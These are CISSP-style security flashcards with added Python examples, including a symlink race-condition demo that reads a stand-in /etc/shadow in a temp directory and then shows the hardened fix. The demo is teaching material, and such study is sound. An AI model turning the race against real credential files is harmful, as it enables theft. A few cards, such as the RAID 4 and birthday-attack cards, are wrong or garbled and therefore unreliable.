Prepare a Security Plan: Ensure that security is considered during all phases of the IT system life cycle
PGP
Pretty Good Privacy. Whole Disk Encryption for data at rest
Processes
Processes communicate between the rings via system calls.
3 Types of Policy
Program Policy, Issue-Specific Policy, and System-Specific Policy.
Components of Program Policy
Purpose, Scope, Responsibilities, Compliance.
12:PSH
Push data to application layer
Compensating
Put in place to compensate for weaknesses in other controls. e.g., surfing explicit web sites would be cause for an employee to lose his/her job.
Raid Levels
RAID 0: Striped Set RAID 1: Mirrored Set RAID 3: Byte Level Striping with Dedicated Parity RAID 4: Block Level Striping with Distributed Parity. RAID 5: Block Level Striping with Distributed Parity RAID 6: Block Level Striping with Double Distributed Parity
IAB's Ethics and the Internet
RFC 1087; published 1987. Lists practices considered unethical if someone purposefully commits them.
IGPs
RIP OSPF
Real-time Transport Protocol
RTP. Common VoIP protocol. VoIP is based on data.
RFID
Radio Frequency Identification used to create wirelessly readable tags for animals or objects. Eg: Faraday Wallet/ Cage
RAD
Rapid Application Development rapidly develops software via the use of prototypes, "dummy" GUIs, back-end databases, and more.
Third normal Form
Remove data that is not dependent on the primary key. [35]
Stateless Autoconfiguration
Removes the requirement for DHCP
Linux/UNIX permissions
Read("r") Write("w") Execute("x") May be set separately to the owner, group, or world.
Fourth Amendment
Reasonable Search and Seizure
Repeater
Receives bits on one port and repeats them out the other port. (No Security)
Repeater
Receives bits on one port, repeats on another
Whole Disk Encryption
Recommended for ensuring confidentiality. Partial encryption, such as encrypted files, folders, or partitions, often risks exposing sensitive data stored in temporary files.
Watchdog Timer
Recover a system by rebooting after critical processes hang or crash
RPO
Recovery Point Objective is the amount of data loss or system inaccessibility (measured in time) that an organization can withstand
RTO
Recovery Time Objective describes the maximum time allowed to recover business or IT systems
Caller ID
Requires calling from the correct phone number. Caller ID can be easily forged
Inference
Requires deduction: there is a mystery to be solved and lower level details provide the clues.
Sarbanes-Oxley Act of 2002 (SOX)
Requires disclosure, auditor independence, and internal security controls, e.g., risk assessment. Intentional violation of SOX can result in criminal charges.
Gramm-Leach-Bliley Act (GLBA)
Requires financial institutions to protect the confidentiality and integrity of consumer financial information. Forced them to notify consumers of their privacy practices.
Database Security
Requires security precautions, inference controls and polyinstantiation
13:RST
Reset (tear down) a connection
General DRP
Respond Activate Team Communicate Assess Reconstitution
Cryptanalysis
Science of breaking encrypted
Steganography
Science of hidden communications. Hide inside image, Encoding in pixels as bit streams.
Scrum
Scrum development model (named after a scrum in the sport of rugby) is an Agile model first described in "The New New Product Development Game". Holistic approach to Software Development.
SESAME
Secure European System for Applications in a Multi-vendor Environment. Single sign-on system that supports heterogeneous environments. The addition of public key (asymmetric) encryption is the most compelling feature. It addresses one of the biggest weaknesses in Kerberos: the plaintext storage of symmetric keys
SHA-1, SHA-2
Secure Hashing Algorithm. Announced in 1993 and 2001 respectively. SHA-1 has a 160 bit digest length. SHA-2 has 224, 256, 384, and 512 bit message digest lengths.
SLA
Service Level Agreements are vital when dealing with third-party development shops
SOA
Service Oriented Architecture. Attempts to reduce application architecture down to a functional unit of a service. SOA is intended to allow multiple heterogeneous applications to be consumers of services.
OSI Model
Seven layer model. APSTNDP
Shared Demarc
Shared Telecom Demarcation Point. Where the ISP's responsibility ends and the customer's begins. Should employ strong physical access controls.
STP
Shielded Twisted Pair/Coaxial. Better than UTP
Active Response NIPS
Shoots down malicious traffic via a variety of methods, including forging TCP RST segments to source or destination (or both), or sending ICMP port, host, or network unreachable to source.
Redundant Network Architecture
Should any single circuit or site go down, at least one alternate path is available
Positive Pressure Drain
Should be employed by HVAC. Means air and water should be expelled from the building. Water should drain away.
Object Reuse
Should be prevented. The act of recovering information from previously-used objects, such as computer files.
System Config Reevaluation.
Should happen every 3 years.
Employee Termination
Should result in immediate revocation of all employee access. An organization's worst enemy can be a disgruntled former employee. Termination should be fair
SDN
Software Defined Networking (SDN) separates a router's control plane from the data (forwarding) plane.
Open Source
Software or source code that is publicly available.
SSD
Solid State Drive, a combination of flash memory(EEPROM) and DRAM
Type 3
Something you are: Biometric
Type 2
Something you have: Badge
Type 1
Something you know: PIN
GPS/ IP and Geo-Location
Somewhere you are...
Striping
Spreading data writes across multiple disks to achieve performance gains, used by some levels of RAID
SDLC
Synchronous Data Link Control is a synchronous Layer 2 WAN protocol that uses polling to transmit data. Polling is similar to token passing
SONET
Synchronous Optical Networking. Carries multiple T-carrier circuits via fiber optic cable. Physical fiber ring for redundancy.
SONET
Synchronous Optical Networking: multiple T-carrier circuits via fiber optic cable
SDLC 2
System Concept Development
OpenFlow
TCP protocol that uses TLS encryption
Relation
Table
Garbage Collection
Takes care of old blocks. Unused and unerased blocks are moved out of the way and erased in the background. Identifies unneeded data and clears the blocks.
Encapsulation
Takes information from a higher layer and adds a header to it, treating the higher layer information as data. One layer's header is another layer's data.
Telnet
Telnet provides terminal emulation over a network. Provides no confidentiality. Has limited integrity
BCI
The Business Continuity Institute. The Good Practice Guidelines (GPG) are the independent body of knowledge for good Business Continuity practice worldwide.
OWASP
The Open Web Application Security Project. Represents one of the best application security resources. OWASP provides a tremendous number of free resources dedicated to improving an organization's security posture.
SIEM
The Security Information and Event Manager is a primary tool used to ease the correlation of data across disparate sources
UDP
User Datagram Protocol. A simpler and faster cousin to TCP. UDP has no handshake, session, or reliability. Connectionless. Used for applications that are lossy.
SDLC
The Systems Development Life Cycle. SDLC is used across the IT industry, but SDLC focuses on security when used in context of the exam. Standards are based on NIST
Brute Force
The attacker calculates the hash outputs for every possible password
Birthday Attack
The birthday attack is used to create hash collisions. Eg: If you add 22/365 + 21/365 + 20/365 + 19/365 ... + 1/365
Crux of SDLC
The concepts of security.
Security Domain
The list of objects a subject is allowed to access. Domains are groups of subjects. Confidential, Secret, and Top Secret are three security domains used by the DoD.
***NOTE***
The most important objective for all controls is personnel safety. This is especially true for DRP
Ring -1
The newest mode of operation that utilizes a hypervisor(virtual machine, Intel VT, AMD-V).
Enticement
The perpetrator involved is determined to have already broken a law or is intent on doing so.
ARPAnet
The predecessor of the Internet
Tailoring
The process of customizing a standard for an organization
Scoping
The process of determining which portions of a standard will be employed by an organization
Recovery
The recovery phase involves cautiously restoring the system or systems to operational status.
Reporting
The reporting phase of incident handling occurs throughout the process, beginning with detection. Reporting must begin immediately upon detection of malicious activity.
Cryptology
The science of secure communications.
VoIP
Voice over Internet Protocol (VoIP) carries voice via data networks, a fundamental change from analog POTS (Plain Old Telephone Service), which remains in use after over 100 years
Background Check
Thorough investigation should be conducted before hiring someone. A criminal record check should be conducted. All experience and education, certifications verified.
Commandment #10
Thou shalt always use a computer in ways that ensure consideration and respect for your fellow humans.
Commandment #8
Thou shalt not appropriate other people's intellectual output.
Commandment #6
Thou shalt not copy or use proprietary software for which you have not paid.
Commandment #2
Thou shalt not interfere with other people's computer work.
Commandment #3
Thou shalt not snoop around in others' computer files.
Commandment #5
Thou shalt not use a computer to bear false witness.
Commandment #1
Thou shalt not use a computer to harm other people.
Commandment #4
Thou shalt not use a computer to steal.
Commandment #7
Thou shalt not use other people's computer resources without authorization or proper compensation.
Commandment #9
Thou shalt think about the social consequences of the program you are writing or the system you are designing.
KLOC
Thousand(K) Lines Of Code
Misuse Case Testing
To formally model, again most likely using UML, how security impact could be realized by an adversary abusing the application
TCP
Transmission Control Protocol is a reliable Layer 4 protocol. Uses a three-way handshake to create reliable connections across a network
TLS
Transport Layer Security is the latest version of SSL, equivalent to SSL version 3.1. May be used to encrypt many types of data
TCP Flags
URG ACK PSH RST SYN FIN
Computer Fraud and Abuse Act - Title 18 Section 1030
US Law Pertaining to computer crimes. Attacks on protected computers, government, financial computers. $5,000 damage considered criminal.
Flash Memory
USB Thumb Drives. Specific type of EEPROM used for small portable disk drives. Magnetic field will not erase Flash Memory.
100baseT
UTP means 100 megabit, baseband, twisted pair.
Motion Detectors
Ultrasonic and microwave detectors work like "Doppler Radar": the signal bounces back. Photoelectric sends a beam of light and alerts if the light beam is broken. These sensors are active. Passive infrared detects body heat. All are forms of physical intrusion detection.
UPS
Uninterruptible Power Supplies provide protection against electrical failure.
Primary Key
Unique value in table
Need to Know
User must need to know that specific piece of information before accessing it.
False Positive
User surfs the Web to an allowed site, and NIDS alerts
True Negative
User surfs the Web to an allowed site, and NIDS is silent
Mode of Operation(Access control)
Uses either a discretionary access control implementation or a mandatory access control implementation. 4 Modes: 1. Dedicated 2. System High 3. Compartmented 4. Multilevel
One-Time Pad
Uses identical paired pads of random characters, with a set amount of characters per page. Eg: Y + C = B, then B - C = Y. The one time pad is the only encryption method that is mathematically proven to be secure, if the following three conditions are met.
Fiber Optic Network Cable
Uses light to carry information, and can carry a tremendous amount of information. Past 50 miles. Multimode uses light dispersion. Single Mode uses one strand.
Asset Value(AV)
Value of an asset
Risk = Threat × Vulnerability Equation
Vulnerability scanning factor equating
Ward
Warded locks must turn a key through channels (called wards).
IAB Practice 3
Wastes resources (people, capacity, computer) through such actions.
WDM
Wavelength Division Multiplexing allows multiple signals to be carried via the same fiber
TFTP
Runs on UDP port 69. It provides a simpler way to transfer files and is often used for saving router configurations or "bootstrapping"
WAN
Wide Area Network, typically covering cities, states, or countries
SAM File
Windows stores hashes for passwords on the Local Machine and Domain Controller in this file.
WLAN
Wireless Local Area Network. Generally has no way to assure availability
802.11
Wireless technology. 802.11i is the first variation to provide reasonable security.
Civil Law(Common Law)
Within common law, civil law refers to laws put in place in order to compensate a victim monetarily for damages.
Antivirus software
designed to prevent malware infections
Penetration Tester must...
always protect data and system integrity.
DNS cache poisoning attack
an attempt to trick a caching DNS server into caching a forged response.
Prototyping
an iterative approach that breaks projects into smaller tasks, creating multiple mockups (prototypes) of system design features.
Greenfield
an undeveloped lot of land
Relational Database
contain two-dimensional tables of related data.
Database Dictionary
contains a description of the database tables.
Decryption
converts ciphertext into plaintext
Static Routes
fixed routing entries stating "The route for network 10.0.0.0/8 routes via router 192.168.2.8." Small/Home Offices have static "default" route that sends all external traffic to one router. Set preferences via specific routing protocols
Operating System:
• System events • Audit records
Authentication Server (AS)
a server that authenticates a supplicant (802.1X)
Attribute
A column in a table (relation).
Well-Formed Transactions
Ability to enforce control over applications. This process is comprised of the "access control triple:" user, transformation procedure, and constrained data item.
Inactive Account Policy
Accounts inactive for more than 30 consecutive days. Identifying new accounts that have not been used for more than 10 days following their creation
NIST SDLC Step 11
Accreditation: The formal authorization by the accrediting (management) official for system operation and an explicit acceptance of risk.
11:ACK
Acknowledge received data
Acquisition of Media
Acquisition will leverage binary backups and the use of hashing algorithms to verify the integrity of the binary images
Canons(2)
Act honorably, honestly, justly, responsibly, and legally
ARP
Address Resolution Protocol is used to translate between Layer 2 MAC addresses and Layer 3 IP addresses. Think ARP Cache poisoning(MitM)
Virtualization
Adds a software layer between the OS and computer hardware. Runs stock OSs
Access Control Categories
Administrative, Technical, Physical.
Overwriting
"Deleting" removes the entry from the File Allocation Table (FAT) and marks the data blocks as "unallocated"
BS-25999 and ISO 22301
Part 1, the Code of Practice, provides business continuity management best practice recommendations. Part 2, the Specification, provides the requirements for a Business Continuity Management System (BCMS) based on BCM best practice. Specifies the requirements for setting up and managing an effective business continuity management system (BCMS) for any organization of any size/type.
WORM
(Write Once Read Many) Storage can be written to once, and read many times. Supports legal or regulatory compliance. Eg: CD-R (CD-RW and DVD-RW are not WORM media). Some Digital Linear Tape (DLT) drives and media support WORM.
Halon Replacements
- Argon - FE-13 - FM-200 - Inergen
Core Principles of PCI-DSS
Build and Maintain a Secure Network and Systems; Protect Cardholder Data; Maintain a Vulnerability Management Program; Implement Strong Access Control Measures; Regularly Monitor and Test Networks; Maintain an Information Security Policy.
"PASS" method (For Portable Extinguishers)
Pull the pin; Aim low (at the base of the fire); Squeeze the handle; Sweep from side to side.
5 Components of PKI
-Certification Authorities (CAs) that issue and revoke certificates -Organizational Registration Authorities (ORAs) that vouch for the binding between public keys and certificate holders -Certificate holders that are issued certificates and can sign digital documents -Clients that validate digital signatures and their certification paths from a known public key -Repositories that store and make available certificates and Certificate Revocation Lists (CRLs)
MAC to IPv6 (Modified EUI-64)
Derives the 64-bit IPv6 interface identifier from a 48-bit MAC address. 1. Take the MAC address: 00:0c:29:ef:11:36. 2. Insert the constant ff:fe between the two halves: 00:0c:29:ff:fe:ef:11:36. 3. Flip the Universal/Local bit (the 0x02 bit of the first byte): 02:0c:29:ff:fe:ef:11:36. 4. Prepend the /64 network prefix and write in colon-hex form: fc01:0000:0000:0000:020c:29ff:feef:1136. 5. Collapse one run of zero groups to "::": fc01::20c:29ff:feef:1136. Because the MAC is recoverable from the address, EUI-64 addresses expose the hardware identity; privacy extensions (RFC 4941) use random interface identifiers instead.
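The conversion above, and its inverse, as working code. This is an added example and not part of the study set; the MAC address and the fc01::/64 prefix are the card's, the function names are assumptions of the example.

```python
"""Modified EUI-64: derive an IPv6 interface identifier from a MAC address.

Added example for the MAC-to-IPv6 card; not part of the study set. The MAC
and the fc01::/64 prefix are the ones from the card; the function names are
this example's own.
"""
import ipaddress


def mac_to_eui64_ipv6(mac: str, prefix: str = "fc01::/64") -> str:
    """Return the compressed IPv6 address formed from prefix + EUI-64(mac)."""
    octets = bytearray(int(part, 16) for part in mac.split(":"))
    if len(octets) != 6:
        raise ValueError("expected a 48-bit MAC address")

    # Step 1: split the MAC in half and insert the constant ff:fe.
    eui64 = octets[:3] + bytearray([0xFF, 0xFE]) + octets[3:]

    # Step 2: flip the Universal/Local bit (0x02 in the first octet):
    # a burned-in (globally unique) MAC starts 00 and becomes 02.
    eui64[0] ^= 0x02

    # Step 3: prepend the /64 prefix; ipaddress produces the "::" form.
    network = ipaddress.IPv6Network(prefix)
    if network.prefixlen != 64:
        raise ValueError("EUI-64 interface identifiers need a /64 prefix")
    host_bits = int.from_bytes(eui64, "big")
    address = ipaddress.IPv6Address(int(network.network_address) | host_bits)
    return str(address)


def eui64_ipv6_to_mac(address: str) -> str:
    """Reverse the derivation: recover the MAC from an EUI-64-based address.

    This is exactly why EUI-64 addresses are a privacy concern: anyone who
    sees the address learns the hardware identity of the interface.
    """
    iid = int(ipaddress.IPv6Address(address)) & ((1 << 64) - 1)
    eui64 = bytearray(iid.to_bytes(8, "big"))
    if eui64[3:5] != b"\xff\xfe":
        raise ValueError("interface identifier is not modified EUI-64")
    eui64[0] ^= 0x02                      # undo the Universal/Local flip
    mac_octets = eui64[:3] + eui64[5:]    # drop the ff:fe filler
    return ":".join(f"{b:02x}" for b in mac_octets)


if __name__ == "__main__":
    print(mac_to_eui64_ipv6("00:0c:29:ef:11:36"))   # fc01::20c:29ff:feef:1136
```

The reverse function is the practical point: if a host autoconfigures with EUI-64, its MAC (and so its vendor and, across networks, its identity) can be read straight out of any address it uses.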
BCP/DRP Items:
1. Executive management support is needed for initiating the plan. 2. Executive management support is needed for final approval of the plan. 3. Executive management must demonstrate due care and due diligence and be held liable under applicable laws/regulations.
Forensic Phases
1. Identification of potential evidence 2. Acquisition of that evidence 3. Analysis of the evidence 4. Production of a report
Race Condition /etc/shadow
A time-of-check/time-of-use (TOCTOU) attack against a privileged program. 1. The program checks that the file "test" is readable by the user. 2. Before the program uses that result, the attacker deletes "test" and creates a symbolic link named "test" pointing to /etc/shadow. 3. The attacker then lets the privileged process continue; it opens "test" (now a symbolic link to /etc/shadow) and the earlier check is bypassed. Mitigation: open first and inspect the open descriptor (fstat), and refuse to follow symbolic links (O_NOFOLLOW).
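The race and its fix, run safely inside a temporary directory. This is an added example, not part of the study set: a constructed "shadow" file stands in for /etc/shadow, and the attacker's swap is invoked in-line between the check and the open so the race window is deterministic (on a real system a second process would be racing the privileged one). It assumes a POSIX system, since it relies on symlinks, O_NOFOLLOW and fstat.

```python
"""TOCTOU symlink race: check-then-open versus open-then-verify.

Added example for the race-condition card; not from the study set. Runs in
a temp directory with a constructed stand-in for /etc/shadow, so it is safe
to run unprivileged. POSIX only (symlinks, O_NOFOLLOW, fstat).
"""
import os
import stat
import tempfile


def vulnerable_read(path: str, attacker_swap) -> bytes:
    """Check the path, then open the path: two lookups of the same name."""
    st = os.stat(path)                       # time of check (follows symlinks)
    if not stat.S_ISREG(st.st_mode):
        raise PermissionError("not a regular file")
    attacker_swap()                          # the race window
    with open(path, "rb") as fh:             # time of use: name resolved again
        return fh.read()


def hardened_read(path: str, attacker_swap, expected_uid: int) -> bytes:
    """Open first, then verify the object that was actually opened.

    O_NOFOLLOW makes open() fail if the final component is a symlink, and
    fstat() examines the descriptor, so a later rename of the name is moot.
    """
    attacker_swap()                          # same window, nothing to win
    fd = os.open(path, os.O_RDONLY | os.O_NOFOLLOW)
    with os.fdopen(fd, "rb") as fh:          # fdopen owns and closes fd
        st = os.fstat(fh.fileno())           # check the descriptor, not the path
        if not stat.S_ISREG(st.st_mode) or st.st_uid != expected_uid:
            raise PermissionError("refusing to read: wrong type or owner")
        return fh.read()


def demo() -> dict:
    """Run both versions against the same attack; report what each read."""
    with tempfile.TemporaryDirectory() as workdir:
        shadow = os.path.join(workdir, "shadow")   # stand-in for /etc/shadow
        test = os.path.join(workdir, "test")       # the user's harmless file
        with open(shadow, "wb") as fh:
            fh.write(b"root:$6$constructed$not-a-real-hash:19000:0:99999:7:::\n")
        os.chmod(shadow, 0o600)

        def attacker_swap():
            # Delete "test" and replace it with a symlink to the secret file.
            os.unlink(test)
            os.symlink(shadow, test)

        def fresh_test_file():
            if os.path.lexists(test):
                os.unlink(test)
            with open(test, "wb") as fh:
                fh.write(b"harmless\n")

        results = {}
        fresh_test_file()
        results["vulnerable"] = vulnerable_read(test, attacker_swap)
        fresh_test_file()
        try:
            results["hardened"] = hardened_read(test, attacker_swap, os.getuid())
        except OSError:                     # ELOOP from O_NOFOLLOW, or our PermissionError
            results["hardened"] = "blocked"
        return results


if __name__ == "__main__":
    print(demo())
```

The vulnerable version hands back the shadow file's contents even though its check passed; the hardened version never opens through the link at all. The general rule is to make every security decision on the open file object, never on a path name that someone else can rewrite.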
Expert System Example
1. If your computer is turned on a. Else: turn your computer on 2. Then if your monitor is turned on a. Else: turn your monitor on 3. Then if your OS is booted and you can open a cmd.exe prompt a. Else: repair OS 4. Then if you can ping 127.0.0.1 a. Else: check network interface configuration 5. Then if you can ping the local gateway a. Else: check local network connection 6. Then if you can ping Internet address 192.0.2.187 a. Else: check gateway connectivity 7. Then if you can ping syngress.com a. Else: check DNS
Five mistakes of Log Analysis
1. Logs are not reviewed on a regular and timely basis. 2. Audit logs and audit trails are not stored for a long enough time period. 3. Logs are not standardized or viewable by correlation toolsets—they are only viewable from the system being audited. 4. Log entries and alerts are not prioritized. 5. Audit records are only reviewed for the "bad stuff."
ISO 17799 11 Areas
1. Policy 2. Organization of Information Security 3. Asset Management 4. Human Resources Security 5. Physical and Environmental Security 6. Communications and Operations Management 7. Access Control 8. Information systems acquisition, development, and maintenance 9. Information security incident management. 10. Business continuity management 11. Compliance
8 Step Incident Handling Methodology
1. Preparation 2. Detection (aka Identification) 3. Response (aka Containment) 4. Mitigation (aka Eradication) 5. Reporting 6. Recovery 7. Remediation 8. Lessons Learned (aka Post-incident Activity, Post Mortem, or Reporting)
NIST Incident Response
1. Preparation 2. Detection and Analysis 3. Containment, Eradication and Recovery 4. Post-incident Activity
Object-Oriented Analysis and Design(OOAD) on NIDS
1. Sniffs packets from a network and converts them into pcap (packet capture) format; 2. Analyzes the packets for signs of attacks, which could include Denial of Service, client-side attacks, server-side attacks, web application attacks, and others; 3. If a malicious attack is found, the NIDS sends an alert. NIDS may send alerts via email, paging, syslog, or security information and event managers (SIEMs).
Class C
192.0.0.0 - 223.255.255.255. Each Class C network has 256 addresses (254 usable hosts after the network and broadcast addresses).
TCP Header Fields
20 bytes without options. Source and destination port; sequence and acknowledgment numbers (keep full-duplex communication in sync); TCP flags (SYN, ACK, FIN, RST, PSH, URG); window size (amount of data that may be sent before receiving an acknowledgment); plus data offset, checksum, and urgent pointer. Clients typically connect from a high ephemeral source port (e.g. 51870) to a low well-known destination port (e.g. 22).
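A parser for the fixed header described above, with a builder used to construct the sample segment. This is an added example and not part of the study set: the SYN from port 51870 to port 22 is built by hand here to match the card, not captured traffic, and the function names are the example's own.

```python
"""Parse the 20-byte fixed TCP header (plus options) with struct.

Added example for the TCP Header Fields card; not from the study set. The
sample segment is constructed (a SYN from ephemeral port 51870 to port 22),
not captured traffic.
"""
import struct

# Flag bits live in the low byte of the 16-bit data-offset/flags field.
TCP_FLAGS = {"FIN": 0x01, "SYN": 0x02, "RST": 0x04, "PSH": 0x08, "ACK": 0x10, "URG": 0x20}
HEADER_FMT = "!HHIIHHHH"              # network byte order, 2+2+4+4+2+2+2+2 = 20 bytes
HEADER_LEN = struct.calcsize(HEADER_FMT)


def parse_tcp_header(segment: bytes) -> dict:
    """Decode the fixed header, then use the data offset to split options/payload."""
    if len(segment) < HEADER_LEN:
        raise ValueError(f"need at least {HEADER_LEN} bytes, got {len(segment)}")
    src, dst, seq, ack, off_flags, window, checksum, urgent = struct.unpack(
        HEADER_FMT, segment[:HEADER_LEN])
    data_offset = (off_flags >> 12) * 4   # header length in bytes, options included
    if data_offset < HEADER_LEN or data_offset > len(segment):
        raise ValueError("data offset points outside the segment")
    flags = [name for name, bit in TCP_FLAGS.items() if off_flags & bit]
    return {
        "src_port": src, "dst_port": dst,
        "seq": seq, "ack": ack,
        "flags": flags,
        "window": window,
        "checksum": checksum,
        "urgent_pointer": urgent,
        "options": segment[HEADER_LEN:data_offset],
        "payload": segment[data_offset:],
    }


def build_tcp_header(src, dst, seq, ack, flags, window, options=b"") -> bytes:
    """Inverse of parse_tcp_header (checksum left zero; it needs the IP pseudo-header)."""
    if len(options) % 4:
        options += b"\x00" * (4 - len(options) % 4)   # options pad to 32-bit words
    data_offset_words = (HEADER_LEN + len(options)) // 4
    off_flags = (data_offset_words << 12) | sum(TCP_FLAGS[f] for f in flags)
    return struct.pack(HEADER_FMT, src, dst, seq, ack, off_flags, window, 0, 0) + options


def is_client_to_server(header: dict) -> bool:
    """Heuristic from the card: high ephemeral source port to a low well-known port."""
    return header["src_port"] >= 1024 and header["dst_port"] < 1024


# Constructed sample: client SYN from 51870 to SSH (22) carrying an MSS option
# (kind 2, length 4, value 1460).
SAMPLE_SYN = build_tcp_header(51870, 22, 0x1A2B3C4D, 0, ["SYN"], 64240,
                              options=b"\x02\x04\x05\xb4")

if __name__ == "__main__":
    print(parse_tcp_header(SAMPLE_SYN))
```

The data-offset check matters in practice: a header that claims more bytes than the segment carries is exactly the kind of input that has crashed naive parsers, so reject it instead of slicing past the end.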
Limited Broadcast Address
255.255.255.255
Graham-Denning Model
3-part model: objects, subjects, and rules. Provides a granular approach for interaction between subjects and objects. R1: transfer access; R2: grant access; R3: delete access; R4: read object; R5: create object; R6: destroy object; R7: create subject; R8: destroy subject.
DoD Destruction Method (Gutmann Approach)
DoD 5220.22-M specified 3 or 7 overwrite passes; the Gutmann method uses 35. For undamaged modern magnetic media, a single successful overwrite pass is now commonly considered sufficient in industry to render data unrecoverable (see NIST SP 800-88).
X86 CPU's
32-bit CISC processors (the 64-bit extension of the architecture is x86-64).
Escrowed Encryption
A third-party organization holds a copy of the public/private key pair. The private key is divided into two or more parts, each held in escrow, and released only with proper authorization. Offers a balance between individual privacy and the needs of law enforcement.
TCP/IP Model
4 layer model. Network Access, Internet, Transport, Application.
Divestitures
AKA de-mergers or de-acquisitions. One company becomes two or more. The split of sensitive information must be monitored closely, since the risk of insider attacks exists: old credentials, duplicate accounts, badges, and security controls that still grant access across the new boundary.
Administrative Law
AKA Regulatory Law is law enacted by government agencies. The executive branch of the U.S. Government can create administrative law without requiring input from the Legislative branch.
Encapsulation
AKA data hiding
Defense-in-Depth
AKA layered defenses, applies multiple safeguards(controls: measures to reduce risk) to protect an asset. Multiple controls help improve the confidentiality, integrity, and availability of your data.
Cybersquatting
Registering or using, in bad faith, a domain name associated with another person's trademark. Typosquatting is the variant that registers common misspellings of a legitimate domain.
Swapping
Often used interchangeably with paging. Uses virtual memory: copies a block of memory (a process or page) to or from disk.
Asynchronous Response Mode
ARM Secondary nodes may initiate communication with the primary
Canon(4)
Advance and protect the profession.
Dummy File
Also called a flag, is a file that is provided to the tester in place of a real file containing sensitive or protected data.
Traceability Matrix
Also called an RTM can be used to map customers' requirements to the software testing plan
Strong authentication
Also called multifactor authentication requires that the user present more than one authentication factor
Synthetic Transactions
Also called synthetic monitoring: involves building scripts or tools that simulate activities normally performed in an application
Southbridge(Bus)
Also called the I/O Controller Hub; connects input/output devices (keyboard, mouse, CD drive, etc.).
Northbridge(Bus)
Also called the Memory Controller Hub (MCH), connects the CPU to RAM and video memory.
Fetch & Execute
Also called "Fetch, Decode, Execute" (FDX). CPUs fetch machine language instructions (e.g., add 1+1) and execute them: 1. Fetch 2. Decode 3. Execute 4. Write (save the result). In the simple textbook model these four steps take one clock cycle to complete; real CPUs pipeline them so several instructions are in flight at once.
Meeting Point Leader
Assures that all personnel are accounted for at the emergency meeting point. Avoid during evacuation
ATM
Asynchronous Transfer Mode. WAN technology that uses fixed length cells. 53 bytes long, with a 5-byte header and 48-byte data portion.
ARCNET(Deterministic)
Attached Resource Computer Network is a legacy LAN technology. ARCNET ran at 2.5 megabits and popularized the star topology
Known Key
Attacker knows something about the Key.
AOC
Attestation of Compliance
Server Rooms
Auditing physical access to server rooms is necessary to maintain physical security. Door security is key.
NIST SDLC Step 15
Audits and Monitoring: A system audit is a one-time or periodic event to evaluate security. Monitoring refers to an ongoing activity that examines either the system or the users.
CHAP
Challenge Handshake Authentication Protocol. More secure than PAP: the password is never sent in cleartext; the client answers a random challenge with a hash of the challenge and the password. The password is stored on the CHAP server.
LEAP
Cisco-proprietary protocol released before 802.1X was finalized. Flaws, should not be used
***Exam Warning***
Clark-Wilson requires that users are authorized to access and modify data. It also requires that data is modified in only authorized ways.
Classful IPv4 Networks
Classes A - E. For normal networks, A - C
Gates
Classes I - IV ASTM F2200
CIDR
Classless Inter-Domain Routing allows far more flexible network sizes than those allowed by classful addresses.
Full-duplex
Send and receive simultaneously (telephone).
Digital
Communications transfer data in bits: ones and zeroes
Centralized access control
Concentrates access control in one logical point for a system or organization. Instead of using local access control databases, systems authenticate via third-party authentication servers
Binary or Bit stream image
Creates an exact, bit-for-bit replica of the original data, as needed for forensic analysis.
XSS
Cross-Site Scripting (XSS) leverages third-party execution of web scripting languages such as JavaScript within the security context of a trusted site.
Purpose(Policy)
Describes the need for policy to protect the confidentiality, integrity and availability of protected data.
Deterrent Controls
Deters users from performing actions on a system. Examples include a "beware of dog" sign.
SSL
Developed for the Netscape web browser. Secure Sockets Layer (SSL) authenticates and provides confidentiality to web traffic. Transport Layer Security (TLS) is the successor to SSL. Used as part of HTTPS. E.g.: connect to a website; the browser downloads the server's digital certificate, which includes its public key, and asymmetric encryption is used to establish the session.
SDLC 6
Development
NIST SDLC Step 4
Development/acquisition: The system is designed, purchased, programmed or developed.
Service Level Agreements
Dictate what is considered acceptable regarding things such as bandwidth, time to delivery, response times, etc.
DNS
Domain Name System: a distributed, global, hierarchical database that translates names to IP addresses. Uses both UDP and TCP (port 53). Two classic resolver functions: gethostbyname() (given a name, returns an IP address) and gethostbyaddr() (given an address, returns the name).
Deadbolt
A lock bolt that extends into the strike plate. The door cannot be closed while the deadbolt is extended (locked).
Attestation
Ensures scrutiny has been applied to an organization's security posture. Attestation of security posture usually follows an audit. SAS 70 Review
XOR
Exclusive Or. The secret sauce behind modern encryption. Combining a key with a plaintext via XOR creates a ciphertext. XOR-ing the same key to the ciphertext restores the original plaintext.
Privileged Programs
The "s" in the execute position of a file's permissions marks it setuid/setgid: it runs with the privileges of the file owner (often the superuser) or group rather than those of the user who launched it.
PATRIOT Act of 2001
Expanded law enforcements electronic monitoring capabilities. Broader coverage for wiretaps, search and seizure without immediate disclosure. Generally lessened judicial oversight of law enforcement.
Due Diligence
The management activity of verifying that due care is being exercised: researching, investigating, and following up (e.g., checking that staff actually follow policy).
RAID 10(1 + 0)
Explicitly indicate the nesting, the configuration is that of a striped set of mirrors. System Redundancy
Chain of Custody
Express the reliability of evidence. Once evidence is acquired, full documentation be maintained regarding the who, what, when, and where relating to the handling of said evidence. i.e. signatures.
The Copyright Term Extension Act, 1998
Extended the copyright term by 20 years. At the time, author copyright was life plus 50 years, and 75 years for corporate works.
EAP
Extensible Authentication Protocol is an authentication framework that describes many specific authentication protocols. Provides authentication at Layer 2"port based"
XML
Extensible Markup Language. Standard way to encode documents and data. Similar to HTML; used on the web but not tied to it. XML lets users define their own data formats.
EGP
Exterior Gateway Protocols route between autonomous systems; BGP is the EGP of the Internet (Layer 3).
Doors
Externally facing hinges are a security concern: the hinge pins can be removed from outside.
Proxy Firewalls
Firewalls that act as intermediary servers. Both the packet filter and stateful firewalls pass traffic through or deny it. Proxies terminate connections.
Mantrap
First door locks before second can open.
Forensic Software Analysis
Focuses on comparing or reverse engineering software: reverse engineering malware is one of the most common examples. Investigators are often presented with a binary copy of a malicious program, and seek to deduce its behavior
Communications and Network Security
Focuses on the confidentiality, integrity and availability of data in motion.
Tailgating
Following an authorized person into a building without providing credentials
Business Continuity Planning
For ensuring that the business will continue to operate before, throughout, and after a disaster event is experienced.
Shareware
Fully functional proprietary software that may be initially used free of charge
IPv4
Internet Protocol version 4 is the fundamental protocol of the Internet. IPv4 was used for the ARPANET. A simple protocol designed to carry data across networks. 32-bit addresses.
IDS
Intrusion Detection System. Detective device designed to detect malicious (including policy-violating) actions
IPS
Intrusion Prevention System. A preventive device designed to prevent malicious actions.
Vernam Cipher
Invented by Gilbert Vernam(Employee of AT&T Bell Labs). Used bits that were XORed to plaintext bits.
